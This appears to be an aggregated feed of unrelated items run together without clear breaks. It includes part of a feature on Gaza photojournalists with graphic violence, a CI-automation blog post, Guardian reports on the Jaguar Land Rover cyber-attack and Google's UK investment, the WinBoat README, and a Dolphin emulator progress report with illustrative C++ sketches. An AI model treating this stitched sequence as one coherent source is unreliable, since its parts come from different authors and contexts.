The greatest challenges are the lack of safety, frequent electricity and internet outages, and the difficulty of reaching event sites amid continuous bombardment. “I try to separate work from emotions, but it is extremely difficult. Sometimes, after shooting, I feel an internal collapse. I console myself with the thought that what I do has value and meaning, and that my pain cannot be compared to the suffering of those I document,” recounted Fteiha.
There are no “neutral zones” in Gaza; every area is dangerous. “The greatest danger is being directly targeted. Many colleagues have been injured or killed while covering events,” Fteiha said. He doesn’t want the world to see Palestinians as just a political issue, but as fathers, mothers, and children who deserve dignity.
He described his mission as more than work — it is duty. “Every image I capture might become a voice for the voiceless and could help convey the suffering of people who would otherwise remain invisible or ignored,” he said. “If we stop documenting, who will show the world what’s happening here in Gaza?”
“Louder Than Words”
A dead child in Gaza’s Al-Shati refugee camp on June 19, 2025, killed by Israeli fire while playing in the summer heat.
Photo: Motasem Abu Aser
Motasem Abu Aser, 30, is a documentary filmmaker and short story creator.
Photography began as an obsession for him. From childhood, he felt drawn to the camera. His heart always belonged to visual storytelling. After surviving a near-fatal head injury while covering the Great March of Return in 2018, he refused to stop. “People thought I would quit journalism after that, but the fear was erased. Nothing could scare me anymore,” he asserts.
Motasem Abu Aser
Photo: Courtesy of Motasem Abu Aser
His work on “The Night Won’t End,” an Al Jazeera documentary that included the story of 6-year-old Hind Rajab, trapped under bombardment, became one of his most powerful works. “When you film in the moment, you capture history as it burns. That is why our work has meaning,” he highlights.
Since October 7, his days have blurred into endless hours of work. He rarely sleeps, sometimes only half an hour at a time; he feels as if he works 24 hours a day. “As a filmmaker, I don’t just hold a camera — I carry images in my mind constantly. Sleep is fleeting; even with eyes closed, my mind remains alert,” he recounts.
At the Anan family massacre near Saraya Street in December 2023, Abu Aser was the first to document the atrocity. Soldiers lined women and girls on a billiard table, bound them, and shot at them randomly. Men were trapped under stairs and exposed to explosives, killed slowly. “Images always speak louder than words. Often, a photo alone suffices; a caption may not even be needed,” said Abu Aser.
For a long time, we had a recurring TODO in our calendar: once a month, check whether any Linux distro we test against got a new stable version—or dropped support for an old one.
Sounds simple. In reality, it was annoying, error-prone, and we were always late. Someone had to remember, look up release notes, update our CI matrix, and push a commit. Sometimes we missed a release for weeks, even months. Sometimes we forgot to remove an EOL version. It was busywork, not engineering.
It gives you a structured JSON about supported and upcoming releases. Exactly what we needed: a single place to know what’s alive and what’s dead.
Step 2: Update CI automatically
We wrote a GitHub Action that queries this API, parses the versions, and updates our CI matrix. The action runs every week, so our testing matrix is always fresh.
Instead of telling people “remember to bump Ubuntu when a new LTS comes out,” the pipeline does it for us.
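The post doesn’t reproduce the script itself; as a rough sketch of the idea, a query against an endoflife.date-style endpoint (the URL and field shapes below are our assumptions, not taken from the post) might look like:
import Foundation

// Fetch release cycles for a distro and keep only the ones that
// are still supported; these become the CI matrix entries.
struct Cycle: Decodable {
    let cycle: String   // e.g. "24.04"
    let eol: String?    // end-of-life date, if one is set
}

let url = URL(string: "https://endoflife.date/api/ubuntu.json")!
let (data, _) = try await URLSession.shared.data(from: url)
let cycles = try JSONDecoder().decode([Cycle].self, from: data)

// ISO dates compare correctly as plain strings.
let today = String(ISO8601DateFormatter().string(from: .now).prefix(10))
let supported = cycles.filter { ($0.eol ?? "9999-12-31") > today }
print(supported.map(\.cycle)) // feed these into the CI matrix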
Step 3: Open a PR, not a mystery commit
Nobody likes automation silently pushing to
main
. We used
peter-evans/create-pull-request
to have the action open a PR with the changes.
That way:
We can see exactly which versions got added/removed.
Tests run as usual.
If something breaks, main stays intact. A human is kept in the loop, in charge of merging the PR.
Step 4: Watchdog for the watchdog
One last problem: what if the action itself fails?
A broken script could silently stop updating distros, and we wouldn’t notice until we’re back to being weeks out of date. To prevent that, we hooked the action up to Dead Man’s Snitch.
If the action stops reporting, we get pinged in Slack. So even the automation is monitored.
Done!
No more monthly TODOs. No more late updates. No more “oops, we’re still testing against an unsupported Debian.”
Our CI matrix now always tracks the current stable versions, with almost zero manual work. And we get to spend our time on actual engineering instead of distro babysitting.
Neyts is the Pareto Security co-founder and Tech Lead.
Jaguar Land Rover extends production shutdown after cyber-attack
Guardian
www.theguardian.com
2025-09-16 09:04:39
Carmaker says it will freeze production until at least 24 September as it continues investigationsBusiness live – latest updatesJaguar Land Rover has extended its shutdown on car production, as Britain’s biggest carmaker grapples with the aftermath of a cyber-attack. JLR said on Tuesday it would fre...
Jaguar Land Rover has extended its shutdown on car production, as Britain’s biggest carmaker grapples with the aftermath of a cyber-attack.
JLR said on Tuesday it would freeze production until at least next Wednesday, 24 September, as it continues its investigations into the hack, which first emerged earlier this month.
The manufacturer said: “We have taken this decision as our forensic investigation of the cyber incident continues, and as we consider the different stages of the controlled restart of our global operations, which will take time.
“We are very sorry for the continued disruption this incident is causing and we will continue to update as the investigation progresses.”
JLR, which is owned by India’s Tata group, stopped production at its sites after discovering hackers had infiltrated its systems a few weeks ago.
The company has since found the attack has affected “some data”, although it said it could not provide more details of what data was affected, or if customers’ or suppliers’ information was stolen, but that it would contact anyone affected.
The costs of the cyber-attack are likely building for JLR, as production at its factories in the Midlands and Merseyside are put on hold. Other production facilities around the world have also been affected, fuelling speculation that it could be weeks until systems are operational.
The freeze has also affected suppliers and retailers for JLR, with some operating without computer systems and databases normally used for sourcing spare parts for garages or registering vehicles.
Last week, the Unite union warned that thousands of workers in the JLR supply chain were at risk of losing their livelihoods, and urged the government to step in with a furlough scheme to support them.
Disruption from the cyber-attack could last until October. Thousands of JLR production workers have been told not to come in to work, and reports suggest that a number of the company’s suppliers have also had to tell their staff to stay at home.
The shutdown has reportedly led to JLR missing out on production of 1,000 cars a day, losing £72m each day in sales.
A group of hackers, linked to other serious hacks this year on retailers including Marks & Spencer, have claimed responsibility for the attack on JLR. Screenshots allegedly showing JLR’s internal IT systems were posted on a Telegram channel that combined the names of groups of hackers known as Scattered Spider, Lapsus$ and ShinyHunters.
The disruption at JLR comes as it faces falling profits amid the impact of US tariffs and declining sales. The carmaker reported that underlying pre-tax profits dropped 49% to £351m in the three months to June. That included a period when the company temporarily paused exports to the US.
We are writing the next chapter in Computing with six technology roadmaps that will bring a new era of performance and efficiency to information technology and business.
AP Live: View from Gaza as Israel Begins Expanded Operation in Gaza City
Google announces £5bn AI investment in UK before Trump visit
Guardian
www.theguardian.com
2025-09-16 08:00:40
Rachel Reeves says move is a ‘vote of confidence’ in British economy as she prepares to open firm’s first UK datacentreBusiness live – latest updatesGoogle has said it will invest £5bn in the UK in the next two years to help meet growing demand for artificial intelligence services, in a boost for th...
Google has said it will invest £5bn in the UK in the next two years to help meet growing demand for artificial intelligence services, in a boost for the government.
The investment, which comes as Google opens its new datacentre in Waltham Cross in Hertfordshire, is expected to contribute to the creation of thousands of jobs, the US tech company said.
The chancellor, Rachel Reeves – who is attempting to drive growth amid pressure over the lacklustre state of the UK economy – said the investment into research and development, capital expenditure and engineering was a “vote of confidence” in the UK economy.
The US president, Donald Trump, begins his official state visit to the UK on Tuesday, and the ChatGPT parent firm, OpenAI, and the chip designer Nvidia will this week also reportedly announce billions of dollars’ worth of investment into British datacentres.
On Tuesday, Google said it would pump £5bn into capital expenditure, research and development, and related engineering over the next two years, which would include “pioneering” AI research in science and healthcare through its Google DeepMind operation.
The Silicon Valley company said the investment would help the UK grow its AI economy and contribute to technological breakthroughs, improvements in cybersecurity and job creation.
Google predicted the investment would help to create 8,250 jobs annually at UK businesses.
Reeves will officially open the company’s first UK datacentre in Waltham Cross on Tuesday, amid growing demand for Google’s Cloud, Workspace, Search and Maps services.
Google said it would partner with Shell to help it manage its renewable energy supply in the UK.
The Guardian reported on Monday that a new Google datacentre in Essex was expected to emit more than half a million tonnes of carbon dioxide a year.
Reeves will also host the bosses of top US and UK financial companies in Downing Street on Tuesday. The meeting, which will be hosted jointly by the US Treasury secretary, Scott Bessent, will be attended by senior figures from BlackRock, Barclays and Blackstone.
Trump will make a two-day visit to the UK, which will include a series of business events, as well as a state banquet with tech bosses and senior cabinet ministers on Wednesday evening. The US president will then travel to Chequers on Thursday for a business reception, working lunch and press conference with Keir Starmer.
Google’s £5bn investment comes amid a wider increase in its capital expenditure budget, with the company telling investors in July it expected to invest about $85bn in its 2025 financial year, compared with a previous estimate of $75bn.
On Monday, its parent company, Alphabet, became the fourth business to surpass a market capitalisation of $3tn, joining fellow tech companies Nvidia, Microsoft and Apple.
Reeves said: “Google’s £5bn investment is a powerful vote of confidence in the UK economy and the strength of our partnership with the US, creating jobs and economic growth for years to come.
“This government is reversing decades of underinvestment that has held us back for too long, by slashing burdensome red tape, delivering bold reforms of the planning system and investing in better tech to unlock better jobs and opportunities.”
The Google DeepMind co-founder and chief executive, Demis Hassabis, said: “We founded DeepMind in London because we knew the UK had the potential and talent to be a global hub for pioneering AI.
“The UK has a rich history of being at the forefront of technology – from Lovelace to Babbage to Turing – so it’s fitting that we’re continuing that legacy by investing in the next wave of innovation and scientific discovery in the UK.”
winboat: Run Windows apps on Linux with seamless integration
Windows for Penguins.
Run Windows apps on 🐧 Linux with ✨ seamless integration
Screenshots
⚠️ Work in Progress ⚠️
WinBoat is currently in beta, so expect to occasionally run into hiccups and bugs. You should be comfortable with some level of troubleshooting if you decide to try it, however we encourage you to give it a shot anyway.
Features
🎨 Elegant Interface: Sleek and intuitive interface that seamlessly integrates Windows into your Linux desktop environment, making it feel like a native experience
📦 Automated Installs: Simple installation process through our interface - pick your preferences & specs and let us handle the rest
🚀 Run Any App: If it runs on Windows, it can run on WinBoat. Enjoy the full range of Windows applications as native OS-level windows in your Linux environment
🖥️ Full Windows Desktop: Access the complete Windows desktop experience when you need it, or run individual apps seamlessly integrated into your Linux workflow
📁 Filesystem Integration: Your home directory is mounted in Windows, allowing easy file sharing between the two systems without any hassle
✨ And many more: Smartcard passthrough, resource monitoring, and more features being added regularly
How Does It Work?
WinBoat is an Electron app which allows you to run Windows apps on Linux using a containerized approach. Windows runs as a VM inside a Docker container, and we communicate with it using the WinBoat Guest Server to retrieve the data we need from Windows. For compositing applications as native OS-level windows, we use FreeRDP together with Windows's RemoteApp protocol.
Prerequisites
Before running WinBoat, ensure your system meets the following requirements:
Additionally, for development you need to have NodeJS and Go installed on your system
Clone the repo (git clone https://github.com/TibixDev/WinBoat)
Install the dependencies (npm i)
Build the guest server (npm run build-guest-server)
Run the app (npm run dev)
Contributing
Contributions are welcome! Whether it's bug fixes, feature improvements, or documentation updates, we appreciate your help making WinBoat better.
Please note
: We maintain a focus on technical contributions only. Pull requests containing political/sexual content, or other sensitive/controversial topics will not be accepted. Let's keep things focused on making great software! 🚀
Feel free to:
Report bugs and issues
Submit feature requests
Contribute code improvements
Help with documentation
Share feedback and suggestions
Check out our issues page to get started, or feel free to open a new issue if you've found something that needs attention.
These past few years some cool projects have surfaced with similar concepts, some of which we've also taken inspiration from.
They're awesome and you should check them out:
The Dolphin Blog is full of stories surrounding games, their development, and the challenges they present to emulate them. And in these stories, we sometimes have some recurring characters that we gain a better understanding of over time. Factor 5 and their Star Wars: Rogue Squadron games continue to amaze us time and time again as we find different ways that they push the hardware to its limits. The Legend of Zelda: The Wind Waker uses many graphical tricks to create a timeless style that surprises again and again with just how much care was put into every detail. And, of course, the Metroid Prime series shows up often given its sensitivity to even subtle changes to emulation.
However, as with every story, there have to be villains as well. One such villain is The Disney Trio of Destruction™. For years, users have awaited the final showdown with these games. And guess what? They're finally playable right now. But are these games truly villains? Or were they just misunderstood? In this report, we dive into The Disney Trio of Destruction™ once and for all to determine their true nature.
Not every returning character is a game. Sometimes we also have to deal with our own issues, such as Dual Core mode. It is constantly breaking games, disabled in many popular games by default, and the source of most crashes in Dolphin. But is Dual Core really a hack? Or is Dolphin simply doing something wrong? In this report, we'll dive into the history of Dual Core and make a change that was long overdue.
On top of all of this, several longstanding features in Dolphin also saw some major upgrades, and we'll also get to those throughout the Dolphin Progress Report. With that, let us begin.
Since the release of the Nintendo Switch 2, we have been repeatedly asked if Dolphin supports the Nintendo Switch 2 NSO GameCube Controller. The short answer is not yet. The long answer is that Switch 2 controllers do some weird things; rather than take this on ourselves, we are waiting for the professionals at SDL to figure it all out. Currently they have an implementation, but it's early and missing features. Once they get it to a good place and it is in an SDL release, we will adopt it into Dolphin.
It is no secret that Dual Core mode in Dolphin is unstable. If you've ever had Dolphin randomly crash while going into fullscreen, switching windows, or simply for no apparent reason, you've likely run into a Dual Core crash. In fact, pretty much any time someone comes to us with a crash, the first thing we tell them is to turn off Dual Core.
However, we doubt users understand the full extent of the problem.
But if Dual Core mode is so bad, why haven't we removed it?
For all of its downsides, Dual Core is fast. Dolphin is largely bound by single thread performance, leaving the many cores of a modern CPU sitting idle. Splitting our primary emulation thread in two can spread the load across more cores and better fit modern CPU designs. This is very effective, and was in fact necessary in the early days to get playable speeds at all, and some users still rely on it even today.
Instead, we have tried to fix Dual Core repeatedly over the years. The most successful of those efforts was Synchronize GPU Thread (SyncGPU). Never heard of it before? Well, that's because despite being the most successful of our efforts, it didn't exactly catch on.
In a typical game, SyncGPU is in-between Dual Core and Single Core, in every sense. And that's the feature's biggest failing. It's neither as stable as Single Core nor as fast as Dual Core, and ends up appealing to neither group. In a game with Dual Core instability that SyncGPU was designed to solve - Metroid Prime 2 in the graph above - it performs no better than Single Core mode, yet isn't as stable. To make matters worse, the additional synchronization between threads creates stutters, so SyncGPU feels worse than Single Core or Dual Core.
So, what's the solution to this problem? We can't make Single Core mode faster without making it less stable, and we can't make Dual Core mode more stable without slowing it down. This has been troubling us for many years.
Fortunately, time has provided us with an alternative. You may have noticed from the graph above that all three processor emulation techniques are way beyond full speed. In 2025, most of our desktop users have PCs that are overpowered for Dolphin. We are at the point where many of our users can comfortably use Single Core at full speed, but most don't because it's not the default. So why not do just that?
We have finally made the decision to disable Dual Core mode by default on desktop. We'd much rather have users mutter about Dolphin being slower than be heartbroken over lost save data caused by a setting they didn't even realize existed. If your computer isn't powerful enough and you need the speed, feel free to turn it back on at your own risk.
If you are on Android, we realize the situation is a bit different on that platform. With all the other things that Android users have to deal with - suspect graphics drivers, aggressive CPU governors, and generally weaker hardware, to name a few - we don't think it's time to swap the default there yet. As such, Dual Core will remain enabled by default on Android for the foreseeable future.
Now, you may be reading this and thinking why is Dual Core bad? In the process of writing this article, we decided to split the more technical discussion into its own section. You can find an in-depth dive into Dual Core mode and why it is so unstable at the bottom of this report. Feel free to zip straight to it with this handy link if you're interested!
Back in 2022, xperia64 made a slew of improvements to Dolphin's DSP accelerator code. Unfortunately, due to the difficulty of reviewing code like this and the fact that it had little in the way of visible results, it wasn't merged right away. Additionally, earlier this year, a bug was found in the original pull request that caused audio to be missing in certain cases.
However, after finally receiving approvals from several reviewers along with additional fixes and testing, it was finally merged as 2503-509 as a seemingly low-risk addition before the next release. Even though this code would globally affect DSP-HLE, DSP-LLE Recompiler, and DSP-LLE Interpreter, we unfortunately didn't test the less commonly used backends nearly as much as we should have.
While DSP-HLE and DSP-LLE Interpreter were both fine, oversights in how DSP-LLE Recompiler handled exceptions caused hangs in select titles after the improvements. While we don't recommend using the DSP-LLE backends due to how performance intensive they are, there is one major reason to do so: Surround Sound support. Users using DSP-LLE Recompiler for that feature found that their games weren't booting in the 2506 release.
After realizing what was wrong, AdmiralCurtiss jumped into action with two hotfixes to how the DSP-LLE Recompiler handled exceptions. One was simply updating the recompiler to allow for exceptions on store instructions, while the other had to do with exception flag handling in specific cases.
With these updates, our DSP-LLE Recompiler users can finally relax, as it is again functioning how it always has: slowly, but reliably.
The Disney Trio of Destruction™. Much like the Four Horsemen of the Apocalypse before them, the Trio of Destruction™ are a fearsome group that bring despair in their wake. Once thought to be just ordinary games, they quickly taught us not to underestimate them. First, Toy Story 3 appeared. Then, Cars 2. And finally, Disney Infinity. By the year 2013, the unholy trinity was complete.
Each game challenged what was expected of a Wii game. Our efforts started with Toy Story 3, as it was the first of the trio to make it to market in 2010 - and it did not work in Dolphin! The rest would release before any of them worked. However, in 2014, Toy Story 3 would seemingly be defeated. A crack in the armor of the impenetrable three, we thought. Soon the others would fall, we thought.
How foolish we were.
Even after fixing Toy Story 3, the other two games would still fail shortly after boot. The failure was so spectacular that everyone thought Dolphin had to be doing something very wrong. Never did we consider that perhaps we were doing exactly what the game wanted us to do.
Over the years, we've been lucky enough to talk to a few developers who worked on various GameCube and Wii games. Most developers are very open toward emulation and happy to see us fix emulation bugs in the games they worked so hard on. However, we're going to go out on a limb and say that Avalanche Software, the team behind the Trio of Destruction™, weren't so fond of us. Not only did they leave crude messages hidden in game data for "hackers" to find, but we also suspect that someone on their team was actively monitoring us.
While Toy Story 3 took a few years to get working, the writing was on the wall for quite some time that it would eventually be solved. So, for Avalanche's next two games, we believe they left a trap specifically designed to defeat Dolphin: the dcache suicide pill.
It takes (relatively) a lot of time to move data between RAM and the CPU. To speed up memory operations, the GameCube and Wii's CPU has something known as the dcache (a special L1 cache). This "data cache" holds the contents of recently accessed memory. Any subsequent reads or writes to that memory can be handled by the dcache instead of RAM, which greatly increases performance.
Until 2022, Dolphin didn't emulate the dcache whatsoever, and just had all memory operations work directly with RAM. This created a vulnerability.
All Avalanche had to do was tell the CPU to write garbage data into a region of memory where critical game code was stored - but write exactly enough garbage data to fill up the dcache without the CPU automatically flushing the changes to RAM. Then, the game would tell the CPU "never mind" and invalidate the dcache. Overwriting critical game code with garbage should leave the game non-functional, but the cache invalidation would prevent the garbage from ever reaching RAM! Dolphin, however, didn't emulate the dcache, so the garbage writes went straight to RAM, overwriting the critical code and killing the game.
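To make the trick concrete, here's a rough C++ sketch of what the suicide pill boils down to. The names and the commented-out cache instruction are our own illustration, not Avalanche's actual code:

    #include <cstddef>
    #include <cstdint>

    // The CPU's L1 data cache is 32 KiB; filling exactly that much with dirty
    // lines means none of the garbage has been flushed back to RAM yet.
    constexpr std::size_t kDcacheSize = 32 * 1024;

    void dcache_suicide_pill(volatile std::uint8_t* critical_code) {
        // Step 1: scribble garbage over the region holding critical game code.
        // On console, these stores only dirty the dcache - RAM is untouched.
        for (std::size_t i = 0; i < kDcacheSize; ++i)
            critical_code[i] = 0xDE;

        // Step 2: "never mind" - invalidate the dcache so the dirty lines are
        // discarded and the garbage never reaches RAM on real hardware.
        // invalidate_dcache_range(critical_code, kDcacheSize);  // e.g. PowerPC dcbi
        //
        // An emulator that skips the dcache has already written the garbage
        // straight into RAM, destroying the game's own code.
    }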
This trick is dirty, devious, and very effective at stopping Dolphin, but it doesn't really do much else. While Dolphin has run into various anti-piracy techniques over the years, all of them were intended to detect USB/SD loaders on real hardware. The dcache suicide pill will never trigger on console, even when using the shoddiest of USB loaders. We can't think of any other reason for it to exist except to stop Dolphin from emulating Cars 2 and Disney Infinity.
Nowadays, those who demand accuracy and those who want performance can both be happy, right? Unfortunately, by the time all of this was solved, the games ran terribly in Dolphin. Even Toy Story 3 had poor performance, despite it supposedly running okay at one point. So what the heck was going on now?
Star Wars: The Clone Wars earned its right as the final GameCube game Dolphin booted by doing something no other GameCube game did. It not only allocated the BATs (Block Address Translations) to non-standard locations, but it also did so dynamically during execution. Dolphin's memory management emulation was built on the idea that it knows in advance where valid virtual memory is going to be, and games that subverted those expectations outright broke Dolphin. Supporting Dynamic BATs required a full rewrite of Dolphin's memory management emulation.
As tends to happen during a large-scale rewrite, there was so much to do that a few things fell through the cracks. And while working on Dynamic BATs and preparing the gigantic article on the achievement of booting the last GameCube game, we overlooked something important.
Dynamic BATs destroyed performance in Toy Story 3, despite not affecting any other Wii games. To make matters worse, the dcache suicide pills in Cars 2 and Disney Infinity were hacked out after Dynamic BATs was finished. As far as we knew, these games had always been incredibly slow.
All of the clues were there for us to take on the final mystery, but we didn't put the pieces together until a few months ago, when a user complained that Toy Story 3 ran a lot better in Dolphin 5.0 than in newer releases. That, followed up with a bisect to Dynamic BATs, prompted some investigation.
With the subtlety of a wrecking ball, Billiard decided to simply hack out Dynamic BATs in the latest builds and see if that restored performance. It was a quick and dirty hack that broke a bunch of other games. But it worked. Not only was Toy Story 3's performance problem resolved, but the entire Trio started running at reasonable speeds!
After some discussion, we had a eureka moment. Dynamic BATs made the games slower because we started emulating them more accurately.
The Disney Trio of Destruction™ use the typical memory addresses that any other Wii game would use. However, they remove the default BATs and rely on Page Tables in those areas of memory. Memory accesses via Page Tables always go through our slowmem code, meaning they don't benefit from fastmem - one of Dolphin's biggest performance optimizations. That's why the Trio was so slow! This is also why simply disabling MMU didn't speed up the Trio: Dolphin still supported moving the BATs to different locations, so disabling MMU ended up doing exactly nothing.
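If you're wondering what fastmem actually buys, here's a simplified sketch of the two paths. The helper names are hypothetical stand-ins for Dolphin's real MMU internals:

    #include <cstdint>

    // Hypothetical helpers standing in for the real MMU code.
    std::uint32_t translate_via_page_table(std::uint32_t guest_addr); // software page walk
    std::uint32_t read_physical_u32(std::uint32_t phys_addr);         // backing RAM access

    std::uint8_t* g_fastmem_base; // host-side mapping of guest memory, set up at boot

    // fastmem: when an address is covered by a known BAT mapping, a read is
    // just one add and one load. Invalid accesses fault and fall back below.
    inline std::uint32_t read_u32_fastmem(std::uint32_t guest_addr) {
        return *reinterpret_cast<std::uint32_t*>(g_fastmem_base + guest_addr);
    }

    // slowmem: every access walks the emulated Page Tables. Always correct,
    // even for the Trio's mappings, but dramatically slower per access.
    std::uint32_t read_u32_slowmem(std::uint32_t guest_addr) {
        const std::uint32_t phys = translate_via_page_table(guest_addr);
        return read_physical_u32(phys);
    }

Every single memory access a game makes goes through one of these paths, which is why getting kicked off the fast one hurts so much.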
Upon seeing the success of the hack, JosJuice jumped into action. They had an idea that would allow Dolphin to harness the power of BATs without needing to gut the emulator. After identifying the game code that actually set up the BATs, JosJuice forced the games to put them back at the default locations. And since the Trio all use nearly identical code, the same patch works in all three games, with the only differences being the instruction locations.
This means that in 2025, you can finally emulate Toy Story 3, Cars 2, and Disney Infinity on powerful hardware at full speed. These games are still demanding despite being defanged, but a modern gaming PC should be able to handle them. If your PC is absolutely unhinged, you can even use VBI Frequency Override to push them beyond 60 FPS for high refresh rate gaming!
For those of you who have been waiting for this moment, we hope you enjoy it. It's been a lot of fun investigating and wondering what could be wrong with Toy Story 3, Cars 2, and Disney Infinity.
While our battle with the Disney Trio of Destruction™ is finally over, we have yet to defeat the final bosses of all final bosses: Star Wars: Rogue Squadron II: Rogue Leader and Star Wars: Rogue Squadron III: Rebel Strike. Both of these games heavily rely on Page Tables, and a simple patch isn't going to fix either one. Their design wasn't born of malice; Factor 5 had no choice but to use Page Tables if they wanted to tap into the extra memory available in the GameCube's ARAM chip. And this was Factor 5, so of course they did. Thus, while we were able to hack around the Disney Trio of Destruction™, if we ever want to make the Rogue Squadron games fast, we need to get good at Page Tables.
And for one final twist, a developer close to Avalanche Software during the development of these games reached out to us back in 2021. While they couldn't speak on the dcache suicide pill, they claimed that the interesting behaviors in the Trio of Destruction™'s memory managers weren't anti-emulation tricks. Instead, they had simply taken inspiration from a presentation at GDC 2002 on virtual memory... by the Director of Technology at Factor 5.
The developer who reached out to us had a pretty good point, to be honest. After we ran into the dcache suicide pill, we were very quick to blame just about every odd behavior in these games on anti-Dolphin trickery. In this case, using Page Tables instead of BATs as an anti-emulation trick doesn't really make any sense. After all, replacing the default BATs with Page Tables would have done nothing to stop Dolphin in 2010. The default BATs were hardcoded at the time and would have always been used regardless of what the game requested.
While Wii Remotes (and Balance Boards) connect using standard Bluetooth, they have some quirks that make them difficult to use with other devices. Connecting Wii Remotes works pretty well on Linux, though it's rather spotty on Windows. macOS has problems with even pairing Wii Remotes in the first place, as its Bluetooth stack doesn't like Nintendo's non-standard PIN codes. And you can forget Android entirely - while connecting Wii Remotes did work in the far past, it has been prohibited for some time. Sometimes, a Wii Remote will even just refuse to connect for unknown reasons, especially on Windows.
Assuming we can get the Wii Remotes connected, we still have to make some compromises to get things working. Nintendo made the odd decision to use a power-saving Bluetooth feature called "sniff mode" to adjust the Wii Remote's polling rate from 100Hz to 200Hz. Because "sniff mode" is a low-level feature generally handled by the Bluetooth stack, regular applications are not able to control it. This effectively halves the rate at which we are able to poll the Wii Remote. Dolphin can duplicate input reports to "simulate" 200Hz and prevent games from getting upset over dropped inputs, but doing so can cause problems with motion control detection. This is why titles like Sonic and the Secret Rings can be even more cumbersome when using real Wii Remotes, and why Wii Remote speaker audio is far worse than on a real Wii.
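As a rough sketch of that workaround - with names of our own invention, assuming real reports arrive at roughly 100Hz while the emulated Wii polls at 200Hz:

    #include <optional>

    struct InputReport { /* buttons, accelerometer, IR data... */ };

    class WiimotePollDoubler {
        std::optional<InputReport> m_last;
    public:
        // Called whenever the host Bluetooth stack delivers a real report (~100Hz).
        void OnRealReport(const InputReport& report) { m_last = report; }

        // Called by the emulated Wii every 5 ms (200Hz). When no fresh report
        // has arrived since the last tick, the previous one is replayed so the
        // game never sees a dropped input - at the cost of duplicated motion
        // samples, which is what confuses some motion-heavy titles.
        std::optional<InputReport> Poll() const { return m_last; }
    };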
Wii Remotes also don't use a standard HID (USB Human Interface Device) descriptor, making them unusable as standard game controllers without special drivers. Dolphin mostly works around this by talking with them at the HID layer. Unfortunately, doing so comes with some downsides. For example, other programs running on the host device can disrupt communication - we most often see this with Steam on Windows.
Thankfully, a solution was devised almost a decade ago to deal with all of these problems. In 2016, leoetlino added the ability to "pass through" a Bluetooth adapter directly to the emulated Wii with a little bit of extra setup. Bluetooth Passthrough avoids the headaches of dealing with unwieldy operating system Bluetooth stacks by simply giving the emulated Wii full control over the adapter. Because the Wii's Bluetooth adapter operates using the standard HCI protocol, many off-the-shelf Bluetooth adapters can be used with minimal adjustments. We could have proper 200Hz input polling, support off-brand Wii Remotes that standard Bluetooth stacks can't handle, and even process the Wii Remote speaker data properly. You could even attach a real Wii's Bluetooth adapter to a USB port and get perfect or near-perfect Wii Remote support!
Bluetooth Passthrough does have some downsides, though. Because the emulated Wii has full control over the Bluetooth adapter, you can't connect other Bluetooth devices like headphones or controllers unless you have a second adapter. In addition, certain Dolphin features are not accessible when using Bluetooth Passthrough, like save states. Windows users are also required to install a special driver to override the manufacturer's driver and prevent it from loading. Despite these problems, however, Bluetooth Passthrough remains a popular feature because of all the benefits it brings.
Unfortunately, we've recently observed that more and more modern Bluetooth adapters aren't compatible with Bluetooth Passthrough, and it wasn't immediately apparent why.
While helping users out in our Discord, Billiard noticed that many of the support requests seemed to be coming from users with Bluetooth adapters built on the Realtek RTL8761 chipset. Once he got his hands on one himself, Billiard quickly found the problem. This particular chipset expects to have its firmware loaded by the operating system every time it is connected. When Dolphin has control over the adapter during Bluetooth Passthrough, the operating system doesn't get the chance to load that necessary firmware!
Billiard took action to rectify the issue. First, 2506-171 overhauled the Bluetooth Passthrough code to improve general performance through better packet timing and other minor tweaks. These changes affect every adapter. Most importantly, it also separated Dolphin's emulation logic from the LibUSB logic as a step toward fixing the Realtek firmware problem.
2506-330 built upon the previous changes to add the ability to load Realtek firmware. When attempting to use a Realtek adapter with Bluetooth Passthrough for the first time, you will be prompted to allow Dolphin to download the appropriate firmware file from the internet. Once the firmware is downloaded, it is silently loaded onto the device, just like the operating system would do. This takes what was previously a completely unsupported chipset and makes it work with Bluetooth Passthrough.
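The detection side of this is fairly mundane. As a hedged sketch (the function name is ours, and the actual firmware upload - which happens over vendor-specific HCI commands - is omitted):

    #include <libusb-1.0/libusb.h>
    #include <cstdint>

    constexpr std::uint16_t kRealtekVid = 0x0bda; // Realtek's USB vendor ID

    // Returns true if this adapter looks like one that expects the host to
    // load its firmware on every connection.
    bool NeedsRealtekFirmware(libusb_device* device) {
        libusb_device_descriptor desc;
        if (libusb_get_device_descriptor(device, &desc) != 0)
            return false;
        return desc.idVendor == kRealtekVid;
    }

Once a matching adapter is found and the user approves the download, Dolphin simply does the same job the operating system's Bluetooth stack would have done, before handing the adapter over to the emulated Wii.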
While fixing a single chipset might not seem that significant, given how common it is in modern Bluetooth adapters, this fix has greatly improved Bluetooth Passthrough's overall compatibility. Widespread adapters like the TP-Link Bluetooth 5.3 Nano and the Asus USB-BT500 now work with Bluetooth Passthrough!
You may have noticed our settings UI on desktop has been changing over the past few months. This is part of a greater overhaul that we will cover in detail in the future.
In the meantime, a new feature in Dolphin's Qt GUI is the "Map and Calibrate" button.
The Map and Calibrate option allows you to map and calibrate your joystick at the same time - just click and rotate the stick clockwise a couple of times. For basically any joystick, you'll get ranges perfectly matched to those of a GameCube Controller, Classic Controller, or Nunchuk, with but a single click and a spin! For those needing specialized setups, you can still map everything manually and calibrate afterward.
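Under the hood, the calibration half of this is conceptually simple: sample the stick while you spin it, remember the farthest it reached in each direction, then scale future inputs against that outline. A toy version (ours, not Dolphin's actual code):

    #include <algorithm>
    #include <array>
    #include <cmath>

    class StickCalibrator {
        static constexpr int kSectors = 32;  // angular resolution of the outline
        static constexpr double kPi = 3.14159265358979323846;
        std::array<double, kSectors> m_max{};  // farthest radius seen per sector

        static int SectorOf(double x, double y) {
            const double angle = std::atan2(y, x) + kPi;  // 0..2*pi
            return static_cast<int>(angle / (2 * kPi) * kSectors) % kSectors;
        }
    public:
        // Feed raw samples while the user rotates the stick a couple of times.
        void Sample(double x, double y) {
            auto& limit = m_max[SectorOf(x, y)];
            limit = std::max(limit, std::hypot(x, y));
        }
        // Scale a raw input so the stick's physical range maps onto the full
        // range a GameCube Controller would report, even with an octagonal
        // gate or a worn stick.
        double NormalizedRadius(double x, double y) const {
            const double limit = m_max[SectorOf(x, y)];
            return limit > 0 ? std::min(1.0, std::hypot(x, y) / limit) : 0.0;
        }
    };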
HD Texture Packs are one of the most meaningful enhancements you can throw at GameCube and Wii games. Limited by the storage medium and memory capacity, game developers at the time worked hard to optimize texture resolution. Typically, heroes and main locations were the focus of texture resources, while background elements got the N64 treatment. Those choices look alright at SD resolutions, but when blown up to 4k, the low resolution textures can become extremely obvious.
